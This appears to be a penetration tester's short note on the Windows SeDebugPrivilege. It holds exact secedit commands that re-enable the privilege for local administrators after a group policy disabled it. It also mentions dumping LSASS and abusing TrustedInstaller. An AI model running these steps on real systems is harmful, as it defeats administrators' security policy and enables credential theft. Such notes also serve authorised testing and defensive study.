27.08.2023 ยท dadevel

A Windows Privileges that allows to access the memory of any process and therefore escalation to local admin, e.g. by dumping LSASS.

Untested tools:

GPO Bypass

The debug privilege can be disabled globally via a GPO, but this restriction can be bypassed.

Run whoami /priv as local admin and notice that SeDebugPrivilege is missing.

Export the current security policy to a file.

secedit.exe /export /cfg secpolicy.inf /areas USER_RIGHTS

Edit secpolicy.inf to look like the following:

[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544

This allows the group of local administrators to use the debug privilege again.

Import the modified policy.

echo J | secedit.exe /configure /db secedit.sdb /cfg secpolicy.inf /overwrite /areas USER_RIGHTS

In order for the changes to take effect you must log out and log in again. The changes will stay in effect until the next GPO update cycle.

Alternatively you can abuse TrustedInstaller. It always has the debug privilege.